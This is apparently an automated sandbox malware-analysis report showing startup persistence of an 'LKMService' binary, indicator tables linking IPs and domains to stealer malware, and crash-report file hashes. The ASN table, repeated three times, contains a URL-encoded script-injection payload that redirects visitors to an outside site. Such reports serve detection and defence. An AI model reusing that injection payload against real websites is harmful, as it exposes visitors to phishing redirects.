03:27:45	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_a278fa9619bf4a8490c564cef196d074.lnk
03:27:58	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_c36777343f8646bc9f8bb6efc22ef9b8.lnk
03:28:11	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_c42d1852306b4504949cf6ca50578a33.lnk
03:28:24	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_1256348d10fc4ee0a7d0b9467a5418cd.lnk
03:28:37	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_9b86ceab65de49c49beb8cb12c410381.lnk
03:28:50	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_dfb16a4487ec4beaa1b1d78b04a99008.lnk
03:29:04	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_3f0be1f466f84181ba333a6df3a516b0.lnk
03:29:17	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_14b6d09a20e948a5a8f9a9a0b7ab87d8.lnk
03:29:30	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_e4514974b9824faaadddc6ac58593bda.lnk
03:29:43	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_3be1c6c02fcd4cbca121074b848dedc4.lnk
03:29:56	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_6a116b04f0f242828231c1125d228a02.lnk
03:30:09	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_4692d6301ce44aab83e87c0b2b5f5198.lnk
03:30:23	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_656a64c036b1429a867161afd7bdea67.lnk
03:30:36	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_86d6609c76b64087bc00bfe8c940dcba.lnk
03:30:49	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_814cf7f275454a049baf97daade52701.lnk
21:26:10	API Interceptor	1x Sleep call for process: file.exe modified
21:26:11	API Interceptor	6340307x Sleep call for process: LKMService.exe modified
21:26:26	API Interceptor	4x Sleep call for process: WerFault.exe modified
21:26:44	API Interceptor	6462833x Sleep call for process: GoogleUpdater.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.26.12.205	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/
	Prismifyr-Install.exe	Get hash	malicious	Node Stealer	Browse	api.ipify.org/
	2zYP8qOYmJ.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	api.ipify.org/
	SecuriteInfo.com.Win64.Evo-gen.13899.14592.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
104.21.54.163	firmware.armv7l.elf	Get hash	malicious	Unknown	Browse	104.21.54.163/
172.67.74.152	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	Prismifyr-Install.exe	Get hash	malicious	Node Stealer	Browse	api.ipify.org/
	2zYP8qOYmJ.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
yalubluseks.eu	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	172.67.140.92
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	104.21.54.163
	2zYP8qOYmJ.exe	Get hash	malicious	Unknown	Browse	172.67.140.92
	2zYP8qOYmJ.exe	Get hash	malicious	Unknown	Browse	172.67.140.92
	file.exe	Get hash	malicious	Unknown	Browse	172.67.140.92
	file.exe	Get hash	malicious	Unknown	Browse	104.21.54.163
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	172.67.140.92
	file.exe	Get hash	malicious	Unknown	Browse	172.67.140.92
	file.exe	Get hash	malicious	Unknown	Browse	172.67.140.92
	file.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
api.ipify.org	PO-A1702108.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	AvQTFKdsST.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.26.13.205
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	104.26.12.205
	z92BankPayment38_735.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	172.67.74.152
	file.exe	Get hash	malicious	RDPWrap Tool	Browse	172.67.74.152
	file.exe	Get hash	malicious	RDPWrap Tool	Browse	104.26.13.205
	DHL Shipping documents 0020398484995500.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	Prismifyr-Install.exe	Get hash	malicious	Node Stealer	Browse	104.26.13.205
	Prismifyr-Install.exe	Get hash	malicious	Node Stealer	Browse	104.26.12.205

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Globalfoundries.com_Report_46279.pdf	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	http://fpnc.vnvrff.com/	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://www.florenceco.org/offices/elected/solicitor/docket.php?area=florence%22%3E%3C%69%6D%67%20%73%72%63%3D%22%69%6D%61%67%65%2E%6A%70%67%22%20%6F%6E%65%72%72%6F%72%3D%22%76%61%72%20%75%72%6C%31%20%3D%20%5B%27%68%74%74%27%2C%27%70%3A%2F%2F%67%27%2C%27%6F%27%2C%27%6F%67%27%2C%27%6C%65%2E%63%27%2C%27%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%20%76%61%72%20%75%72%6C%32%20%3D%20%5B%27%68%74%74%27%2C%27%70%3A%2F%2F%67%27%2C%27%6F%27%2C%27%6F%67%27%2C%27%6C%65%2E%63%27%2C%27%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%76%61%72%20%75%72%6C%20%3D%20%5B%27%68%74%27%2C%27%74%70%27%2C%27%73%3A%2F%2F%76%27%2C%27%61%75%6C%27%2C%27%74%64%6F%27%2C%27%72%65%73%2E%63%27%2C%27%6F%6D%2F%30%2F%27%2C%27%30%2F%30%2F%27%2C%27%34%33%66%66%27%2C%27%35%63%62%35%27%2C%27%63%36%27%2C%27%32%65%27%2C%27%32%66%38%64%31%27%2C%27%31%63%61%33%38%38%27%2C%27%65%34%37%35%62%36%27%2C%27%63%34%36%2F14/392-16513/1254-3178-27524%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%20%75%72%6C%20%3D%20%75%72%6C%2E%72%65%70%6C%61%63%65%28%2F%2C%2F%67%2C%20%27%27%29%3B%20%76%61%72%20%77%69%6E%20%3D%20%77%69%6E%64%6F%77%2E%6F%70%65%6E%28%75%72%6C%2C%20%27%5F%73%65%6C%66%27%29%3B%20%77%69%6E%2E%6F%70%65%6E%65%72%20%3D%20%6E%75%6C%6C%3B%20%77%69%6E%2E%6C%6F%63%61%74%69%6F%6E%2E%72%65%70%6C%61%63%65%28%75%72%6C%29%3B%22%3E	Get hash	malicious	Phisher	Browse	188.114.96.3
	https://porn-app.com/download2	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	https://perweierscotish.online/	Get hash	malicious	HtmlDropper	Browse	188.114.96.3
	Play_VM-NowCWhiteAudiowav012.html	Get hash	malicious	Tycoon2FA	Browse	188.114.96.3
	deveba=.html	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://orv-moers.powerappsportals.com/	Get hash	malicious	HtmlDropper	Browse	104.18.3.157
	https://www.kisa.link/dANpz	Get hash	malicious	Phisher	Browse	104.21.72.51
	Remittance_10_0224.html	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14
CLOUDFLARENETUS	Globalfoundries.com_Report_46279.pdf	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	http://fpnc.vnvrff.com/	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://www.florenceco.org/offices/elected/solicitor/docket.php?area=florence%22%3E%3C%69%6D%67%20%73%72%63%3D%22%69%6D%61%67%65%2E%6A%70%67%22%20%6F%6E%65%72%72%6F%72%3D%22%76%61%72%20%75%72%6C%31%20%3D%20%5B%27%68%74%74%27%2C%27%70%3A%2F%2F%67%27%2C%27%6F%27%2C%27%6F%67%27%2C%27%6C%65%2E%63%27%2C%27%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%20%76%61%72%20%75%72%6C%32%20%3D%20%5B%27%68%74%74%27%2C%27%70%3A%2F%2F%67%27%2C%27%6F%27%2C%27%6F%67%27%2C%27%6C%65%2E%63%27%2C%27%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%76%61%72%20%75%72%6C%20%3D%20%5B%27%68%74%27%2C%27%74%70%27%2C%27%73%3A%2F%2F%76%27%2C%27%61%75%6C%27%2C%27%74%64%6F%27%2C%27%72%65%73%2E%63%27%2C%27%6F%6D%2F%30%2F%27%2C%27%30%2F%30%2F%27%2C%27%34%33%66%66%27%2C%27%35%63%62%35%27%2C%27%63%36%27%2C%27%32%65%27%2C%27%32%66%38%64%31%27%2C%27%31%63%61%33%38%38%27%2C%27%65%34%37%35%62%36%27%2C%27%63%34%36%2F14/392-16513/1254-3178-27524%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%20%75%72%6C%20%3D%20%75%72%6C%2E%72%65%70%6C%61%63%65%28%2F%2C%2F%67%2C%20%27%27%29%3B%20%76%61%72%20%77%69%6E%20%3D%20%77%69%6E%64%6F%77%2E%6F%70%65%6E%28%75%72%6C%2C%20%27%5F%73%65%6C%66%27%29%3B%20%77%69%6E%2E%6F%70%65%6E%65%72%20%3D%20%6E%75%6C%6C%3B%20%77%69%6E%2E%6C%6F%63%61%74%69%6F%6E%2E%72%65%70%6C%61%63%65%28%75%72%6C%29%3B%22%3E	Get hash	malicious	Phisher	Browse	188.114.96.3
	https://porn-app.com/download2	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	https://perweierscotish.online/	Get hash	malicious	HtmlDropper	Browse	188.114.96.3
	Play_VM-NowCWhiteAudiowav012.html	Get hash	malicious	Tycoon2FA	Browse	188.114.96.3
	deveba=.html	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://orv-moers.powerappsportals.com/	Get hash	malicious	HtmlDropper	Browse	104.18.3.157
	https://www.kisa.link/dANpz	Get hash	malicious	Phisher	Browse	104.21.72.51
	Remittance_10_0224.html	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14
CLOUDFLARENETUS	Globalfoundries.com_Report_46279.pdf	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	http://fpnc.vnvrff.com/	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://www.florenceco.org/offices/elected/solicitor/docket.php?area=florence%22%3E%3C%69%6D%67%20%73%72%63%3D%22%69%6D%61%67%65%2E%6A%70%67%22%20%6F%6E%65%72%72%6F%72%3D%22%76%61%72%20%75%72%6C%31%20%3D%20%5B%27%68%74%74%27%2C%27%70%3A%2F%2F%67%27%2C%27%6F%27%2C%27%6F%67%27%2C%27%6C%65%2E%63%27%2C%27%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%20%76%61%72%20%75%72%6C%32%20%3D%20%5B%27%68%74%74%27%2C%27%70%3A%2F%2F%67%27%2C%27%6F%27%2C%27%6F%67%27%2C%27%6C%65%2E%63%27%2C%27%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%76%61%72%20%75%72%6C%20%3D%20%5B%27%68%74%27%2C%27%74%70%27%2C%27%73%3A%2F%2F%76%27%2C%27%61%75%6C%27%2C%27%74%64%6F%27%2C%27%72%65%73%2E%63%27%2C%27%6F%6D%2F%30%2F%27%2C%27%30%2F%30%2F%27%2C%27%34%33%66%66%27%2C%27%35%63%62%35%27%2C%27%63%36%27%2C%27%32%65%27%2C%27%32%66%38%64%31%27%2C%27%31%63%61%33%38%38%27%2C%27%65%34%37%35%62%36%27%2C%27%63%34%36%2F14/392-16513/1254-3178-27524%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%20%75%72%6C%20%3D%20%75%72%6C%2E%72%65%70%6C%61%63%65%28%2F%2C%2F%67%2C%20%27%27%29%3B%20%76%61%72%20%77%69%6E%20%3D%20%77%69%6E%64%6F%77%2E%6F%70%65%6E%28%75%72%6C%2C%20%27%5F%73%65%6C%66%27%29%3B%20%77%69%6E%2E%6F%70%65%6E%65%72%20%3D%20%6E%75%6C%6C%3B%20%77%69%6E%2E%6C%6F%63%61%74%69%6F%6E%2E%72%65%70%6C%61%63%65%28%75%72%6C%29%3B%22%3E	Get hash	malicious	Phisher	Browse	188.114.96.3
	https://porn-app.com/download2	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	https://perweierscotish.online/	Get hash	malicious	HtmlDropper	Browse	188.114.96.3
	Play_VM-NowCWhiteAudiowav012.html	Get hash	malicious	Tycoon2FA	Browse	188.114.96.3
	deveba=.html	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://orv-moers.powerappsportals.com/	Get hash	malicious	HtmlDropper	Browse	104.18.3.157
	https://www.kisa.link/dANpz	Get hash	malicious	Phisher	Browse	104.21.72.51
	Remittance_10_0224.html	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	MZs41xJfcH.exe	Get hash	malicious	PureLog Stealer, Quasar, zgRAT	Browse	104.21.54.163
	http://www.sunsetsafaris.com.au//home	Get hash	malicious	Unknown	Browse	104.21.54.163
	N5mRSBWm8P.exe	Get hash	malicious	Quasar	Browse	104.21.54.163
	http://fpnc.vnvrff.com/	Get hash	malicious	Unknown	Browse	104.21.54.163
	tcU5sAPsAc.exe	Get hash	malicious	RedLine	Browse	104.21.54.163
	file.exe	Get hash	malicious	Credential Flusher	Browse	104.21.54.163
	https://ca.docusign.net/Signing/EmailStart.aspx?a=ef028e9a-a228-415f-bf68-f187538d8e48&etti=24&acct=5c5d7412-9cb5-4dbf-8a78-52c1b2a30ce5&er=96c6e932-7bdc-4ccf-8eb1-c3c23bac63dc	Get hash	malicious	Unknown	Browse	104.21.54.163
	okLjQnQIef.exe	Get hash	malicious	DCRat	Browse	104.21.54.163
	file.exe	Get hash	malicious	Credential Flusher	Browse	104.21.54.163
	9rSeCZbjZE.msi	Get hash	malicious	AteraAgent	Browse	104.21.54.163

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_GoogleUpdater.ex_b5e9e639d399fad238f3f2a2f4864a4acc04faf_485bd42f_795adb79-7e3b-4a39-a5b7-9048b6b648dc\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	modified
Size (bytes):	65536
Entropy (8bit):	0.9153513922870263
Encrypted:	false
SSDEEP:	96:M++FIu5bSYUXehHKQlUUyx9OxQXIDcQvc6QcEVcw3cE/n+BHUHZopAnQHdE7HeS8:b+dFSYhy70BU/Ka6IkzuiFTZ24IO86
MD5:	3EB9053ED523D250DAC42C3DAC26CA92
SHA1:	4B143BA1604A13CF30BCBC27F585DBC19E392364
SHA-256:	7E7AFEEDECDD9D797EF0289EC387BC2E61B0E953760F92CFA92C284B6628F57B
SHA-512:	44F34BE97157692EB8A04C2BB0DA5EB22F92340FB6F0DCD41C5F3C93D99BE38BC653D6E840C2083F51D983FA711380F1E20019901F7AD745CCADE8283CEBB6C2
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.3.9.2.4.0.8.5.3.1.3.8.3.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.3.9.2.4.0.8.9.8.4.5.0.4.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.9.5.a.d.b.7.9.-.7.e.3.b.-.4.a.3.9.-.a.5.b.7.-.9.0.4.8.b.6.b.6.4.8.d.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.9.d.e.b.0.2.d.-.4.3.c.8.-.4.0.1.5.-.9.c.7.8.-.0.4.8.f.6.9.5.d.c.4.2.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.G.o.o.g.l.e.U.p.d.a.t.e.r...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.L.K.S.M...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.8.8.-.0.0.0.1.-.0.0.1.5.-.6.9.d.8.-.9.1.5.0.3.3.1.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.4.e.d.6.8.4.d.6.0.8.1.f.b.4.8.6.d.b.9.e.f.7.f.1.0.f.a.c.3.7.0.0.0.0.0.0.0.0.0.!.0.0.0.0.f.a.c.a.a.9.3.a.6.1.9.a.b.8.7.d.a.8.a.c.4.4.8.d.d.1.f.c.7.1.f.b.7.2.e.5.3.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_GoogleUpdater.ex_b5e9e639d399fad238f3f2a2f4864a4acc04faf_485bd42f_e3422d00-4588-4363-ac2c-1948855215e7\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.915309316314002
Encrypted:	false
SSDEEP:	96:pIvFZibSYUXe7THKQlUUyx9OxQXIDcQvc6QcEVcw3cE/n+BHUHZopAnQHdE7HeSc:irmSYvy70BU/Ka6IkzuiFTZ24IO86
MD5:	067A82047BBF496AA73784A7B205BD13
SHA1:	0898A223BC53080EA5C2E9E7294046D3A1D07112
SHA-256:	54393EC2AC3C39BDBBCE2E339A95D0B355E85478F280655DD6538752FB414C10
SHA-512:	12D945D41F71F16744EC10CAE806296C9FC87B5E50FF37755A875F91722EABEE554A02A28DDF20F0F5CA1483D5AC549C1E8514D3920374DF0F6DBC0232F15CC6
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.3.9.2.3.9.1.7.6.0.5.6.5.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.3.9.2.3.9.2.6.3.5.5.6.5.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.3.4.2.2.d.0.0.-.4.5.8.8.-.4.3.6.3.-.a.c.2.c.-.1.9.4.8.8.5.5.2.1.5.e.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.d.9.8.6.0.3.b.-.4.6.a.7.-.4.f.e.2.-.a.3.2.a.-.9.b.c.c.5.3.b.6.5.7.e.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.G.o.o.g.l.e.U.p.d.a.t.e.r...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.L.K.S.M...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.3.7.4.-.0.0.0.1.-.0.0.1.5.-.4.9.5.7.-.b.5.4.6.3.3.1.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.4.e.d.6.8.4.d.6.0.8.1.f.b.4.8.6.d.b.9.e.f.7.f.1.0.f.a.c.3.7.0.0.0.0.0.0.0.0.0.!.0.0.0.0.f.a.c.a.a.9.3.a.6.1.9.a.b.8.7.d.a.8.a.c.4.4.8.d.d.1.f.c.7.1.f.b.7.2.e.5.3.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_LKMService.exe_bdbda8d00ab586e1b1371d9646967c78080db8c_54538a4f_501a81ae-381a-4362-8eb5-6f99d9cfdae9\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9120541569106146
Encrypted:	false
SSDEEP:	96:ZfFrsVbSCDjHPQlUUyx9OxQXIDcQvc6QcEVcw3cE/X+BHUHZopAnQHdE7HeS9+xs:RRsJSIjX70BU/aa6IkzuiFTZ24IO8H
MD5:	AC15F7CEE55A2CAF7495C32A2FCC2EAA
SHA1:	2E735E47EF700B3557F3CB2BB6DD2552E8451D99
SHA-256:	51EA34A64F9538D3D77D8B08E3C3B1F50B62F171BD9F87C1E997A18C3D810470
SHA-512:	031117CBD90D1A66525467E7D0FEC3685EE43D80C4CAA292C5F5962F67D6937BBA457757D106A1AEC3CCD92B24561690A1236713046A2B7832F869EF88DA0538
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.3.9.2.4.0.0.6.1.4.6.7.6.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.3.9.2.4.0.1.2.8.6.5.2.6.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.0.1.a.8.1.a.e.-.3.8.1.a.-.4.3.6.2.-.8.e.b.5.-.6.f.9.9.d.9.c.f.d.a.e.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.2.3.7.4.b.7.d.-.7.4.7.c.-.4.c.2.b.-.a.1.b.f.-.a.2.9.3.b.a.2.b.b.c.6.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.L.K.M.S.e.r.v.i.c.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.L.K.S.M...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.c.8.-.0.0.0.1.-.0.0.1.5.-.0.f.b.f.-.a.e.4.b.3.3.1.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.4.e.d.6.8.4.d.6.0.8.1.f.b.4.8.6.d.b.9.e.f.7.f.1.0.f.a.c.3.7.0.0.0.0.0.0.0.0.0.!.0.0.0.0.f.a.c.a.a.9.3.a.6.1.9.a.b.8.7.d.a.8.a.c.4.4.8.d.d.1.f.c.7.1.f.b.7.2.e.5.3.8.0.e.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_LKMService.exe_bdbda8d00ab586e1b1371d9646967c78080db8c_54538a4f_d3f0a05f-2cdf-4b38-947a-11409000491e\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9122150912958615
Encrypted:	false
SSDEEP:	192:/7SdPSIOsX70BU/aa6IkzuiFTZ24IO8H:wPSIdYBU/aaVkzuiFTY4IO8H
MD5:	47D0BA9DE4BC70C9B8F24D8E26B420FA
SHA1:	F2929D8C1354612252A5EC9431F2061505207960
SHA-256:	1E37BCEEBCC176AE0D36C2C4A76177044AB2D2904BFB2E53298627CC19B45C5A
SHA-512:	8207CF50CED570D2D3449F198E4B95DA8BFB4F799680C6F287BE77B863150813DA420D08A60E2E88B5879B1DF7F1AABA8DF6565F40F2BCD41A0BF4FA2FE812A0
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.3.9.2.3.8.3.8.6.6.2.7.3.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.3.9.2.3.8.4.8.8.1.8.8.9.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.3.f.0.a.0.5.f.-.2.c.d.f.-.4.b.3.8.-.9.4.7.a.-.1.1.4.0.9.0.0.0.4.9.1.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.a.5.b.4.b.3.5.-.9.4.e.a.-.4.7.e.f.-.a.5.d.e.-.c.0.8.0.b.3.5.f.6.3.2.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.L.K.M.S.e.r.v.i.c.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.L.K.S.M...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.6.4.-.0.0.0.1.-.0.0.1.5.-.5.6.1.e.-.e.3.4.1.3.3.1.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.4.e.d.6.8.4.d.6.0.8.1.f.b.4.8.6.d.b.9.e.f.7.f.1.0.f.a.c.3.7.0.0.0.0.0.0.0.0.0.!.0.0.0.0.f.a.c.a.a.9.3.a.6.1.9.a.b.8.7.d.a.8.a.c.4.4.8.d.d.1.f.c.7.1.f.b.7.2.e.5.3.8.0.e.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER538F.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Thu Oct 3 01:26:24 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	195044
Entropy (8bit):	4.124697449362486
Encrypted:	false
SSDEEP:	1536:lMC45xTI2hCDltTkM/Cd9MFvuBojRApN4uE2aO4aX7kjk/EOLTgdiDziSVXEKfAq:lb4z82kzXn24uEq48EOLTgd0iyULfs
MD5:	1F5B689970D0D923FCA0E381A89B7D55
SHA1:	83E30EB26157B58FC78D15BCDCC7DD0FC32B922D
SHA-256:	CF9B2E194A01112050BFEF57B1D393766C61F8ABD0C478836935FFB3E1BC65A9
SHA-512:	7E174B8D78D9E956D35F188586B3015F27D34638B05E6D8AEA12DBDB5A89EE9C4DFD1866732953EDBA1F23EF0B39DD84ECDEE340B8F14437C50FE19F24A7A52A
Malicious:	false
Reputation:	low
